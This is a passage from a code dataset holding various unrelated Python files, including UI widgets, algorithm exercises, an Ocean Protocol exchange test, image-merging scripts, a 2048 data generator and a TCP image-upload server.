transition=\"scale-transition\",\n offset_y=True, \n v_slots=[{\n 'name': 'activator',\n 'variable': 'menuData',\n 'children': date_text,\n }], \n children=[date_picker]\n )\n\n super().__init__(\n v_model=None,\n row=True,\n class_='pa-5',\n align_center=True,\n children=[v.Flex(xs10=True, children=[menu])],\n **kwargs\n )\n\n jslink((date_picker, 'v_model'), (date_text, 'v_model'))\n jslink((date_picker, 'v_model'), (self, 'v_model'))\n \nclass FileInput(v.Layout, SepalWidget, HasTraits):\n\n \n file = Unicode('')\n \n def __init__(self, \n extentions=['.txt'], \n folder=os.path.expanduser('~'), \n label='select file', \n **kwargs):\n\n self.extentions = extentions\n self.folder = folder\n \n self.selected_file = v.TextField(\n label='file', \n v_model=self.file\n )\n \n self.file_list = v.List(\n dense=True, \n color='grey lighten-4',\n flat=True,\n children=[\n v.ListItemGroup(\n children=self.get_items(),\n v_model=''\n )\n ]\n )\n \n self.file_menu = v.Menu(\n min_width=300,\n children=[self.file_list], \n close_on_content_click=False,\n max_height='300px', \n v_slots=[{\n 'name': 'activator',\n 'variable': 'x',\n 'children': v.Btn(v_model=False, v_on='x.on', children=[label])\n }])\n \n super().__init__(\n row=True,\n class_='pa-5',\n align_center=True,\n children=[\n v.Flex(xs12=True, children=[self.selected_file]),\n v.Flex(xs12=True, children=[self.file_menu])\n ],\n **kwargs\n )\n \n link((self.selected_file, 'v_model'), (self, 'file'))\n\n def on_file_select(change):\n\n new_value = change['new']\n if new_value:\n if os.path.isdir(new_value):\n self.folder = new_value\n self.change_folder()\n \n elif os.path.isfile(new_value):\n self.file = new_value\n\n self.file_list.children[0].observe(on_file_select, 'v_model')\n \n def change_folder(self):\n \"\"\"change the target folder\"\"\"\n #reset files \n self.file_list.children[0].children = self.get_items()\n \n\n def get_items(self):\n \"\"\"return the list of items inside the folder\"\"\"\n \n list_dir = glob(os.path.join(self.folder, '*/'))\n \n for extention in self.extentions:\n list_dir.extend(glob(os.path.join(self.folder, '*' + extention)))\n \n folder_list = []\n file_list = []\n\n for el in list_dir:\n extention = Path(el).suffix\n if extention == '':\n icon = 'mdi-folder-outline'\n color = 'amber'\n elif extention in ['.csv', '.txt']:\n icon = 'mdi-border-all'\n color = 'green accent-4'\n elif extention in ['.tiff', '.tif']:\n icon = \"mdi-image-outline\"\n color = \"deep-purple\"\n else:\n icon = 'mdi-file-outline'\n color = 'light-blue'\n \n children = [\n v.ListItemAction(children=[v.Icon(color= color,children=[icon])]),\n v.ListItemContent(children=[v.ListItemTitle(children=[Path(el).stem + Path(el).suffix])])\n ]\n\n if os.path.isdir(el): \n folder_list.append(v.ListItem(value=el, children=children))\n else:\n file_list.append(v.ListItem(value=el, children=children))\n \n\n folder_list = sorted(folder_list, key=lambda x: x.value)\n file_list = sorted(file_list, key=lambda x: x.value)\n\n parent_path = str(Path(self.folder).parent)\n parent_item = v.ListItem(value=parent_path, children=[\n v.ListItemAction(children=[v.Icon(color='black',children=['mdi-folder-upload-outline'])]),\n v.ListItemContent(children=[v.ListItemTitle(children=[f'..{parent_path}'])])\n ])\n\n folder_list.extend(file_list)\n folder_list.insert(0,parent_item)\n\n return folder_list\n \n def get_parent_path(self):\n \"\"\"return the list of all the parents of a given path\"\"\"\n path_list = [self.folder]\n path = Path(self.folder)\n\n while str(path.parent) != path_list[-1]:\n path = path.parent\n path_list.append(str(path))\n \n return path_list\n \nclass Markdown(v.Layout, SepalWidget):\n \"\"\"create a v.layout based on the markdown text given\"\"\"\n \n def __init__(self, mkd_str=\"\", **kwargs):\n \n mkd = markdown(mkd_str, extensions=['fenced_code','sane_lists'])\n \n #need to be nested in a div to be displayed\n mkd = '
\\n' + mkd + '\\n
'\n \n #create a Html widget\n class MyHTML(v.VuetifyTemplate):\n template = traitlets.Unicode(mkd).tag(sync=True)\n \n content = MyHTML()\n \n super().__init__(\n row=True,\n class_='pa-5',\n align_center=True,\n children=[v.Flex(xs12=True, children=[content])],\n **kwargs\n )","sub_path":"sepal_ui/sepalwidgets_ui.py","file_name":"sepalwidgets_ui.py","file_ext":"py","file_size_in_byte":22373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"578813976","text":"\n\nimport random\n\nclass node:\n def __init__(self, data, next = 0):\n self.data = data\n self.next = next\n\ndef genlist(n, min = 1, max = 10):\n result = []\n for i in range(n):\n c = random.randint(min, max)\n result.append(c)\n return result\n\ndef linklist(ll):\n ll = ll[::-1]\n count = len(ll)\n head = 0\n for i in range(count):\n n = node(ll[i], head)\n head = n\n return head\n\ndef printlist(head):\n n = head\n while(n != 0):\n print(n.data)\n n = n.next\n\ndef removeDuplicate(head):\n n1 = head\n while(n1 != 0):\n v = n1.data\n n2 = n1.next\n prev = n1\n while(n2 != 0):\n if (n2.data == v):\n prev.next = n2.next\n else:\n prev = n2\n n2 = prev.next\n n1 = n1.next\n\n return head\n\ndef removeDuplicateNew(head):\n n = head\n values = []\n while(n != 0):\n if (not n.data in values):\n values.append(n.data)\n prev = n\n else:\n prev.next = n.next\n\n n = n.next\n\n return head\n\n#method = removeDuplicate\nmethod = removeDuplicateNew\n\n#values = [ 2, 2, 2, 3, 5, 2, 1, 4, 5, 2 ]\nvalues = genlist(10, 1, 5)\nlinkhead = linklist(values)\nprintlist(linkhead)\nprint(\"====================\")\nnewhead = method(linkhead)\nprintlist(newhead)\n","sub_path":"Cracking_the_Coding_Interview/2-1.py","file_name":"2-1.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"464921456","text":"from collections import defaultdict\n\n\nclass Solution:\n def areSentencesSimilar(self, words1, words2, pairs):\n \"\"\"\n :type words1: List[str]\n :type words2: List[str]\n :type pairs: List[List[str]]\n :rtype: bool\n \"\"\"\n if len(words1) != len(words2):\n return False\n pairDict = defaultdict(set)\n for pair in pairs:\n pairDict[pair[0]].add(pair[1])\n pairDict[pair[1]].add(pair[0])\n for i in range(len(words1)):\n if words1[i] != words2[i] and (not words1[i] in pairDict or not words2[i] in pairDict[words1[i]]):\n return False\n return True\n","sub_path":"src/sentence-similarity.py","file_name":"sentence-similarity.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"573086103","text":"from PIL import Image\n\ndef fit(image, size, method=Image.NEAREST, centering=(0.0, 0.0)):\n if not isinstance(centering, list):\n centering = [centering[0], centering[1]]\n\n liveArea = (0, 0, image.size[0], image.size[1])\n liveSize = (liveArea[2] - liveArea[0], liveArea[3] - liveArea[1])\n liveAreaAspectRatio = float(liveSize[0])/float(liveSize[1])\n aspectRatio = float(size[0]) / float(size[1])\n\n if liveAreaAspectRatio >= aspectRatio:\n cropWidth = int((aspectRatio * float(liveSize[1])) + 0.5)\n cropHeight = liveSize[1]\n else:\n cropWidth = liveSize[0]\n cropHeight = int((float(liveSize[0])/aspectRatio) + 0.5)\n\n leftSide = int(liveArea[0] + (float(liveSize[0]-cropWidth) * centering[0]))\n topSide = int(liveArea[1] + (float(liveSize[1]-cropHeight) * centering[1]))\n \n if leftSide < 0:\n leftSide = 0\n \n if topSide < 0:\n topSide = 0\n\n out = image.crop((leftSide, topSide, leftSide + cropWidth, topSide + cropHeight))\n\n return out.resize(size, method)\n\ndef squaremaker(image):\n im = image\n \n w = im.size[0]\n h = im.size[1]\n \n if w 0:\n if grid[x][y - 1] == 1:\n perimeter -= 1\n if y < (width - 1):\n if grid[x][y + 1] == 1:\n perimeter -= 1\n if x > 0:\n if grid[x - 1][y] == 1:\n perimeter -= 1\n if x < (height - 1):\n if grid[x + 1][y] == 1:\n perimeter -= 1\n y += 1\n x += 1\n return (perimeter)\n","sub_path":"0x1C-makefiles/5-island_perimeter.py","file_name":"5-island_perimeter.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"304436976","text":"class RedisDataParserException(Exception):\n \"\"\"\n Basic exception for data parsers\n \"\"\"\n pass\n\n\nclass ParserValueError(RedisDataParserException):\n \"\"\"\n When parser fails to convert parsed value\n from string to another type\n \"\"\"\n\n def __init__(self, msg=None):\n if msg is None:\n msg = 'Parser value error'\n else:\n msg = 'Parser value error: ' + msg\n super().__init__(msg)\n\n\nclass ParserFirstByteNotRecognized(RedisDataParserException):\n \"\"\"\n There is no ongoing parsing and first byte of the\n data does not corresponds to any type of parsing\n \"\"\"\n\n def __init__(self, msg=None):\n if msg is None:\n msg = 'First byte not recognized'\n else:\n msg = 'First byte not recognized: ' + msg\n super().__init__(msg)\n\n\nclass ParserBulkStringWrongSize(RedisDataParserException):\n \"\"\"\n Actual size of the string differs from given ('\\r\\n' is not\n found right after the string)\n \"\"\"\n def __init__(self, msg=None):\n if msg is None:\n msg = 'First byte not recognized'\n else:\n msg = 'First byte not recognized: ' + msg\n super().__init__(msg)\n\n","sub_path":"src/exceptions/redis_data_parser_exceptions.py","file_name":"redis_data_parser_exceptions.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"71425409","text":"__author__ = 'Dell'\nimport requests,os\nfrom bs4 import BeautifulSoup\n\n\n\n\nurl = 'https://github.com/trending?l=python'\nr = requests.get(url)\n\nsoup = BeautifulSoup(r.content)\n\nget_data = soup.find_all('h3',{'class':'repo-list-name'})\n\nos.chdir('/home/ubuntu/pcr/get_git')\nfor link in get_data:\n a_link = link.find_all('a')\n comad = 'git clone'\n for href_link in a_link:\n git_repo_name = href_link.get('href')\n git_repo_url = 'https://github.com' + git_repo_name\n comad = comad + '\\t' + git_repo_url\n os.system(comad)\n\n\n\n","sub_path":"get_git_github.py","file_name":"get_git_github.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"416442874","text":"# build.py\nimport os\nimport platform\nimport sys\nfrom setuptools import setup, find_packages\nimport torch\nfrom torch.utils.ffi import create_extension\n\nextra_compile_args = ['-std=c++11', '-fPIC']\nwarp_rnnt_path = \"../build\"\n\nif torch.cuda.is_available() or \"CUDA_HOME\" in os.environ:\n enable_gpu = True\nelse:\n print(\"Torch was not built with CUDA support, not building warp-ctc GPU extensions.\")\n enable_gpu = False\n\nif platform.system() == 'Darwin':\n lib_ext = \".dylib\"\nelse:\n lib_ext = \".so\"\n\nheaders = ['src/cpu_binding.h']\n\nif enable_gpu:\n extra_compile_args += ['-DWARPRNNT_ENABLE_GPU']\n headers += ['src/gpu_binding.h']\n\nif \"WARP_RNNT_PATH\" in os.environ:\n warp_rnnt_path = os.environ[\"WARP_RNNT_PATH\"]\nif not os.path.exists(os.path.join(warp_rnnt_path, \"libwarprnnt\" + lib_ext)):\n print((\"Could not find libwarprnnt.so in {}.\\n\"\n \"Build warp-rnnt and set WARP_RNNT_PATH to the location of\"\n \" libwarprnnt.so (default is '../build')\").format(warp_rnnt_path))\n sys.exit(1)\ninclude_dirs = [os.path.realpath('../include')]\n\nffi = create_extension(\n name='warprnnt_pytorch._warp_rnnt',\n package=True,\n language='c++',\n headers=headers,\n sources=['src/binding.cpp'],\n with_cuda=enable_gpu,\n include_dirs=include_dirs,\n library_dirs=[os.path.realpath(warp_rnnt_path)],\n libraries=['warprnnt'],\n extra_link_args=['-Wl,-rpath,' + os.path.realpath(warp_rnnt_path)],\n extra_compile_args=extra_compile_args)\nffi = ffi.distutils_extension()\nsetup(\n name=\"warprnnt_pytorch\",\n version=\"0.1\",\n description=\"PyTorch wrapper for RNN-Transducer\",\n url=\"https://github.com/HawkAaron/warp-rnnt\",\n author=\"Mingkun Huang\",\n author_email=\"mingkunhuang95@gmail.com\",\n license=\"Apache\",\n packages=find_packages(),\n ext_modules=[ffi],\n)\n","sub_path":"pytorch_binding/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"391627594","text":"#\n# Copyright 2021 Ocean Protocol Foundation\n# SPDX-License-Identifier: Apache-2.0\n#\n\nimport pytest\nfrom ocean_lib.models.fixed_rate_exchange import FixedRateExchange\nfrom ocean_lib.ocean.ocean_exchange import OceanExchange\n\nfrom ocean_lib.ocean.util import get_contracts_addresses\nfrom ocean_lib.web3_internal.currency import pretty_ether_and_wei, to_wei\nfrom tests.resources.helper_functions import get_consumer_wallet, get_publisher_wallet\n\n_NETWORK = \"ganache\"\n\n\ndef _get_exchange_address(config):\n \"\"\"Helper function to retrieve a known exchange address.\"\"\"\n return get_contracts_addresses(config.address_file, _NETWORK)[\n FixedRateExchange.CONTRACT_NAME\n ]\n\n\ndef test_search_exchange_by_data_token(publisher_ocean_instance):\n \"\"\"Tests searching exchanges which have matching data token address.\"\"\"\n ocn = publisher_ocean_instance\n alice_wallet = get_publisher_wallet()\n bob_wallet = get_consumer_wallet()\n dt = ocn.create_data_token(\n \"DataToken1\", \"DT1\", alice_wallet, blob=ocn.config.metadata_cache_uri\n )\n dt.mint(bob_wallet.address, to_wei(100), alice_wallet)\n dt.approve(ocn.exchange._exchange_address, to_wei(100), alice_wallet)\n\n exchange_id1 = ocn.exchange.create(dt.address, to_wei(\"0.1\"), alice_wallet)\n\n exchange_id2 = ocn.exchange.create(dt.address, to_wei(\"0.1\"), bob_wallet)\n\n logs = ocn.exchange.search_exchange_by_data_token(dt.address)\n\n assert logs[0].args.dataToken == dt.address\n assert logs[1].args.dataToken == dt.address\n assert exchange_id1 == logs[0].args.exchangeId\n assert alice_wallet.address == logs[0].args.exchangeOwner\n assert exchange_id2 == logs[1].args.exchangeId\n assert bob_wallet.address == logs[1].args.exchangeOwner\n\n\ndef test_ocean_exchange(publisher_ocean_instance):\n \"\"\"Tests various flows of DataToken exchanges.\"\"\"\n ocn = publisher_ocean_instance\n alice_wallet = get_publisher_wallet()\n bob_wallet = get_consumer_wallet()\n dt = ocn.create_data_token(\n \"DataToken1\", \"DT1\", alice_wallet, blob=\"http://example.com\"\n )\n dt.mint(bob_wallet.address, to_wei(100), alice_wallet)\n ox = OceanExchange(\n ocn.web3,\n ocn.OCEAN_address,\n _get_exchange_address(publisher_ocean_instance.config),\n ocn.config,\n )\n rate = to_wei(\"0.9\")\n x_id = ox.create(dt.address, rate, bob_wallet)\n dt.approve(ox._exchange_address, to_wei(20), bob_wallet)\n\n # create with invalid token address\n with pytest.raises(ValueError):\n ox.create(ox.ocean_address, rate, bob_wallet)\n\n # TODO: Enable this ValueError handling when the ERC20 check is added in FixedRateExchange.create solidity function\n # with pytest.raises(ValueError):\n # ox.create(ox._exchange_address, 0.9, bob_wallet)\n\n # create with negative rate, should fail\n with pytest.raises(AssertionError):\n _ = ox.create(dt.address, -rate, bob_wallet)\n\n # create using 0 rate\n with pytest.raises(AssertionError):\n _ = ox.create(dt.address, 0, bob_wallet)\n\n ##############\n # get_quote\n base_token_amount = ox.get_quote(to_wei(2), exchange_id=x_id)\n expected_base_token_amount = to_wei(\"1.8\") # 2 * 9\n assert (\n base_token_amount == expected_base_token_amount\n ), f\"unexpected quote of {pretty_ether_and_wei(base_token_amount, 'OCEAN')}, should be {pretty_ether_and_wei(expected_base_token_amount, 'OCEAN')}.\"\n\n #############\n # test buying datatokens\n # Alice is buying from exchange owned by bob\n assert (\n ox.buy_at_fixed_rate(\n to_wei(2),\n alice_wallet,\n max_OCEAN_amount=base_token_amount,\n data_token=dt.address,\n exchange_owner=bob_wallet.address,\n )\n is True\n ), \"buy datatokens failed\"\n assert (\n ox.buy_at_fixed_rate(\n to_wei(2),\n alice_wallet,\n max_OCEAN_amount=base_token_amount,\n exchange_id=x_id,\n )\n is True\n ), \"buy datatokens failed\"\n\n rate = to_wei(1)\n assert ox.setRate(rate, bob_wallet, exchange_id=x_id)\n # re-evaluate with new rate\n base_token_amount = ox.get_quote(to_wei(2), exchange_id=x_id)\n expected_base_token_amount = to_wei(2)\n assert (\n base_token_amount == expected_base_token_amount\n ), f\"unexpected quote of {pretty_ether_and_wei(base_token_amount, 'OCEAN')} base tokens, should be {pretty_ether_and_wei(expected_base_token_amount, 'OCEAN')}.\"\n","sub_path":"ocean_lib/ocean/test/test_ocean_exchange.py","file_name":"test_ocean_exchange.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"219072409","text":"import math\r\ninput_file = open(\"rosalind_prob (1).txt\", 'r')\r\n\r\nlines = input_file.readlines()\r\ncount_gc = 0\r\ncount_at = 0\r\nb = []\r\ndna_string = lines[0]\r\n\r\n# calculating number of GC and AT occurences in the DNA string\r\ncount_gc = dna_string.count('G') + dna_string.count('C')\r\ncount_at = dna_string.count('A') + dna_string.count('T')\r\n\r\n#getting the list of GC values from A\r\ngc_list = lines[1].split()\r\n\r\nfor gc_count in gc_list:\r\n\tgc_percentage = float(gc_count)/2\r\n\tat_percentage = 0.5 - gc_percentage\r\n\tgc_percentage = gc_percentage**count_gc\r\n\tat_percentage = at_percentage**count_at\r\n\tb.append(float(\"{0:.3f}\".format(math.log10(gc_percentage*at_percentage))))\r\n\r\noutput = \"\"\r\n\r\n#formatting the output in the required string form\r\nfor i in b:\r\n\toutput = output + str(i) + \" \"\r\n\r\nprint(output)","sub_path":"PROB.py","file_name":"PROB.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"291510569","text":"\"\"\"\nbyceps.services.shop.shop.dbmodels\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n:Copyright: 2014-2023 Jochen Kupperschmidt\n:License: Revised BSD (see `LICENSE` file for details)\n\"\"\"\n\nfrom typing import TYPE_CHECKING\n\nfrom moneyed import Currency, get_currency\n\n\nif TYPE_CHECKING:\n hybrid_property = property\nelse:\n from sqlalchemy.ext.hybrid import hybrid_property\nfrom sqlalchemy.ext.mutable import MutableDict\n\nfrom byceps.database import db\nfrom byceps.typing import BrandID\nfrom byceps.util.instances import ReprBuilder\n\nfrom .models import ShopID\n\n\nclass DbShop(db.Model):\n \"\"\"A shop.\"\"\"\n\n __tablename__ = 'shops'\n\n id = db.Column(db.UnicodeText, primary_key=True)\n brand_id = db.Column(\n db.UnicodeText,\n db.ForeignKey('brands.id'),\n unique=True,\n index=True,\n nullable=False,\n )\n title = db.Column(db.UnicodeText, unique=True, nullable=False)\n _currency = db.Column('currency', db.UnicodeText, nullable=False)\n archived = db.Column(db.Boolean, default=False, nullable=False)\n extra_settings = db.Column(MutableDict.as_mutable(db.JSONB))\n\n def __init__(\n self, shop_id: ShopID, brand_id: BrandID, title: str, currency: Currency\n ) -> None:\n self.id = shop_id\n self.brand_id = brand_id\n self.title = title\n self.currency = currency\n\n @hybrid_property\n def currency(self) -> Currency:\n return get_currency(self._currency)\n\n @currency.setter\n def currency(self, currency: Currency) -> None:\n self._currency = currency.code\n\n def __repr__(self) -> str:\n return ReprBuilder(self).add_with_lookup('id').build()\n","sub_path":"byceps/services/shop/shop/dbmodels.py","file_name":"dbmodels.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"143294983","text":"# -*- coding:utf-8 -*-\n\nimport os,math,re,sys\n\n\n#输入文件名,返回坐标。\ndef GetXY(Data):\n XY=re.match(r'.+x(\\d+)y(\\d+).+',Data)\n a,b=XY.group(1),XY.group(2)\n return(int(a),int(b))\n\nredF='n'\nif len(sys.argv)<2:\n exit('逗比,这样:%s input.txt [y/n]\\nYes&No用于选择是否合成红晕图片。' % sys.argv[0][sys.argv[0].rfind(os.sep)+1:])\nelse:\n f=open(sys.argv[1],'r')\n\nif len(sys.argv)==3:\n redF=sys.argv[2]\n\n#创建一堆字典备用,base是列表。\nBases=[]\nEyes={}\nEyebrows={}\nMouthes={}\nhongyun=[]\n#创建used文件夹。\nif not os.path.exists('used'):\n os.mkdir('used')\n\nbaseName=sys.argv[1].split('.')[0]+'_'\np=0\nfor raw in f.readlines()[2:]:\n line=raw.encode('cp936').decode('shift-jis')\n NS=line.split('\\t')\n Nm=NS[1]\n x='x'+NS[2]\n y='y'+NS[3]\n JY=re.match(r'\\[(.+?)\\][a-z]?[a-z]?(.+)',Nm)\n#分组,并将小组别添加字典对应。\n NewFN=baseName+str(p)+x+y+'.png'\n if JY.group(1)=='DRESS':\n Bases.append(NewFN)\n elif JY.group(1)=='目':\n for GroupEye in JY.group(2).split('+'):\n Eyes[GroupEye]=NewFN\n elif JY.group(1)=='眉':\n for GroupBrow in JY.group(2).split('+'):\n Eyebrows[GroupBrow]=NewFN\n elif JY.group(1)=='口':\n for GroupMouth in JY.group(2).split('+'):\n Mouthes[GroupMouth]=NewFN\n elif JY.group(1)=='頬':\n for GroupMouth in JY.group(2).split('+'):\n hongyun.append(NewFN)\n if os.path.exists(baseName+str(p)+'.png'):\n os.rename(baseName+str(p)+'.png',NewFN)\n p+=1\n\n#开始处理。\nused=[]\npp=0\nfor KeyName in Eyes.keys():\n Ex,Ey=GetXY(Eyes[KeyName])\n EN=Eyes[KeyName]\n Mx,My=GetXY(Mouthes[KeyName])\n MN=Mouthes[KeyName]\n EBx,EBy=GetXY(Eyebrows[KeyName])\n EBN=Eyebrows[KeyName]\n for BaseName in Bases:\n tempM=['convert']\n #求出每个坐标的差值。\n Bx,By=GetXY(BaseName)\n BEx,BEy=str(Ex-Bx),str(Ey-By)\n BMx,BMy=str(Mx-Bx),str(My-By)\n BEBx,BEBy=str(EBx-Bx),str(EBy-By)\n EP=' +'+BEx+'+'+BEy+' '\n MP=' +'+BMx+'+'+BMy+' '\n EBP=' +'+BEBx+'+'+BEBy+' '\n tempM.append(BaseName)\n g1=EN+' -geometry '+'+'+BEx+'+'+BEy+' -composite'\n g2=MN+' -geometry '+'+'+BMx+'+'+BMy+' -composite'\n g3=EBN+' -geometry '+'+'+BEBx+'+'+BEBy+' -composite' \n tempM.append(g1)\n tempM.append(g2)\n tempM.append(g3)\n ON=' '.join(tempM)+' -quality 35 '+baseName+str(pp)+'.png'\n os.system(ON)\n used.append(BaseName)\n used.append(EN)\n used.append(MN)\n used.append(EBN)\n if sys.argv[2]=='y' or sys.argv[2]=='Y':\n for hyi in hongyun:\n hx,hy=GetXY(hyi)\n Ehx,Ehy=str(hx-Bx),str(hy-By)\n gs=hyi+' -geometry '+'+'+Ehx+'+'+Ehy+' -composite '\n os.system('convert '+BaseName+' '+gs+' '+g1+' '+g2+' '+g3+' '+baseName+str(pp)+'r.png')\n used.append(hyi)\n print('红色JBx合成完毕。')\n print('一个JBx合成完毕。')\n pp+=1\n print('一组JBx合成完毕。')\nprint('一大组JBx合成完毕。')\nfor FN in used:\n OldName=os.getcwd()+os.sep+FN\n NewName=os.getcwd()+os.sep+r'used'+os.sep+FN\n if os.path.exists(OldName):\n os.rename(OldName,NewName)\nprint('全部JBx合成完毕。')\n","sub_path":"K2_TJS_cha_merger.py","file_name":"K2_TJS_cha_merger.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"326482435","text":"import numpy as np\r\nfrom game2048.game import Game\r\nfrom game2048.displays import Display\r\nfrom game2048.agents import ExpectiMaxAgent as TestAgent\r\nimport pandas as pd\r\n\r\n'''在云端运行要使用linux下编译的expectimax'''\r\n\r\ndef single_run(size, score_to_win, AgentClass, **kwargs):\r\n game = Game(size, score_to_win)\r\n agent = AgentClass(game, display=Display(), **kwargs)\r\n one = agent.playtosave()\r\n return one\r\n\r\n'''\r\nGAME_SIZE = 4\r\nSCORE_TO_WIN = 2048\r\nN_TESTS = 2\r\n\r\ngame = Game(GAME_SIZE, SCORE_TO_WIN)\r\nagent = TestAgent(game, display=Display())\r\n\r\nfor _ in range(N_TESTS):\r\n oneround = single_run(GAME_SIZE, SCORE_TO_WIN,AgentClass=TestAgent)\r\n onemax = oneround.max(axis=1)\r\n clue = np.argwhere(onemax==128)[0][0]\r\n onelow = oneround[0:clue,:]\r\n onehigh = oneround[clue:np.size(oneround,0),:]\r\n data1 = pd.DataFrame(onelow) # header:原第一行的索引,index:原第一列的索引\r\n data1.to_csv('./data1.csv',index=False, header=False, mode='a+')\r\n data2 = pd.DataFrame(onehigh) # header:原第一行的索引,index:原第一列的索引\r\n data2.to_csv('./data2.csv', index=False, header=False, mode='a+')\r\n '''\r\n\r\n\r\nGAME_SIZE = 4\r\nSCORE_TO_WIN = 2048\r\nN_TESTS = 6000\r\ngroup = 2\r\n\r\ngame = Game(GAME_SIZE, SCORE_TO_WIN)\r\nagent = TestAgent(game, display=Display())\r\n\r\nfor i in range(int(N_TESTS / group)):\r\n oneround = single_run(GAME_SIZE, SCORE_TO_WIN, AgentClass=TestAgent)\r\n sumround = oneround\r\n for _ in range(group-1):\r\n oneround = single_run(GAME_SIZE, SCORE_TO_WIN,AgentClass=TestAgent)\r\n sumround = np.vstack((sumround, oneround))\r\n\r\n data = pd.DataFrame(sumround) # header:原第一行的索引,index:原第一列的索引\r\n data.to_csv('./data3.csv', index=False, header=False, mode='a+')\r\n\r\n\r\n","sub_path":"game2048/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"73586605","text":"from socket import *\r\nfrom _thread import *\r\nimport threading\r\nimport datetime\r\nimport signal\r\nimport sys\r\n\r\nimport paho.mqtt.client as mqtt\r\nfrom s3_upload import upload_to_s3\r\nimport os\r\nimport signal\r\nimport uuid\r\nimport threading\r\n\r\nfrom time import sleep\r\n\r\nserverPort = 8110\r\nserverSocket = socket(AF_INET, SOCK_STREAM)\r\nserverSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\r\nserverSocket.bind(('', serverPort))\r\nserverSocket.listen(1)\r\n# serverSock.settimeout(None)\r\n\r\nclientNumber = 0\r\ncountOfTotalClient = 0\r\ncountOfRequest = 0\r\nconnectionSocket = None\r\n\r\nthreadArr = []\r\ntimerThread = None\r\n\r\nConverterSemaphore = 1\r\n\r\n# timer function\r\ndef timerFunction() :\r\n print ('Scheduler : {0} Clients connected now.'.format(countOfTotalClient))\r\n\r\n# set timer\r\ndef repeatTimer(interval) :\r\n global timerThread\r\n timerThread = threading.Timer(interval, lambda : (timerFunction(), repeatTimer(interval)))\r\n timerThread.start()\r\n\r\n# ctrl + c handler\r\ndef signal_handler(sig, frame):\r\n for t in threadArr :\r\n if t != None :\r\n t._exit()\r\n if timerThread != None :\r\n timerThread.cancel()\r\n if serverSocket != None :\r\n serverSocket.close()\r\n print('Bye bye~') \r\n sys.exit(0)\r\n\r\n# MyThread Class\r\nclass MyThread(threading.Thread) :\r\n def __init__(self, _connectionSocket, _clientAddress, _clientNumber) :\r\n threading.Thread.__init__(self)\r\n self.__suspend = False\r\n self.__exit = threading.Event()\r\n self._connectionSocket = _connectionSocket\r\n self._clientAddress = _clientAddress\r\n self._clientNumber = _clientNumber\r\n\r\n def _exit(self) :\r\n if (self._connectionSocket != None) :\r\n self._connectionSocket.shutdown(SHUT_RDWR)\r\n self._connectionSocket.close()\r\n self.__exit.set()\r\n\r\n def run(self) :\r\n #self._connectionSocket.settimeout(1)\r\n global countOfTotalClient\r\n global countOfRequest\r\n # reset request count (for Menu 4)\r\n \r\n # recv File information\r\n filename = \"\"\r\n f = None\r\n file_path = \"\"\r\n # communicate with client\r\n while (not self.__exit.is_set()) :\r\n\r\n # menu that selected by client\r\n choose = None\r\n payload = None\r\n\r\n # exception handling ( when client closes TCP connection )\r\n try :\r\n # menu that selected by client\r\n if (self.__exit.is_set()) :\r\n break\r\n\r\n payload = self._connectionSocket.recv(4096)\r\n if payload.find(b'AT+IMGEND') != -1:\r\n f.close()\r\n \r\n os.system('./convert -f '+filename+\".raw\")\r\n print(file_path)\r\n upload_to_s3(str(filename)+\".raw.png\",str(file_path))\r\n\r\n elif payload.find(b\"AT+IMGSTART\") != -1:\r\n\r\n print(payload)\r\n now = datetime.datetime.now()+datetime.timedelta(hours=9)\r\n filename = now.strftime('%Y-%m-%d-%H:%M:%S') + \"AA\"\r\n\r\n f = open(f'{filename}.raw', 'a+b')\r\n\r\n payload = payload.replace(b'AT+IMGSTART;;',b'')\r\n print(payload)\r\n path_idx = payload.find(b';;')\r\n file_path = payload[:path_idx].decode('utf-8')\r\n\r\n print(\"Path_index : \" + str(path_idx))\r\n print(\"File Path_ : \" + file_path)\r\n if path_idx == -1:\r\n print(\"not vailid Packet.\")\r\n continue\r\n\r\n #f.write(payload)\r\n print(\"Started!\")\r\n\r\n elif not payload :\r\n countOfTotalClient = countOfTotalClient - 1\r\n print('Client {0} disconnected. Number of connected clients = {1}'.format(self._clientNumber, countOfTotalClient))\r\n self._connectionSocket.close()\r\n self._connectionSocket = None\r\n break\r\n\r\n else:\r\n f.write(payload)\r\n\r\n payload = payload\r\n #print(payload[-100:])\r\n choose = payload[0]\r\n\r\n if (choose == '') :\r\n raise BrokenPipeError\r\n except timeout :\r\n continue\r\n except (ConnectionAbortedError, BrokenPipeError) :\r\n print('the connection socket has been closed by client! Bye bye~')\r\n countOfTotalClient = countOfTotalClient - 1\r\n print('Client {1} disconnected. Number of connected clients = {2}'.format(self._clientNumber, countOfTotalClient))\r\n self._connectionSocket.close()\r\n self._connectionSocket = None\r\n break\r\n\r\n modifiedMessage = 'message'\r\n #handle other input (error)\r\n #self._connectionSocket.send(modifiedMessage.encode())\r\n\r\n # close connectionSocket and 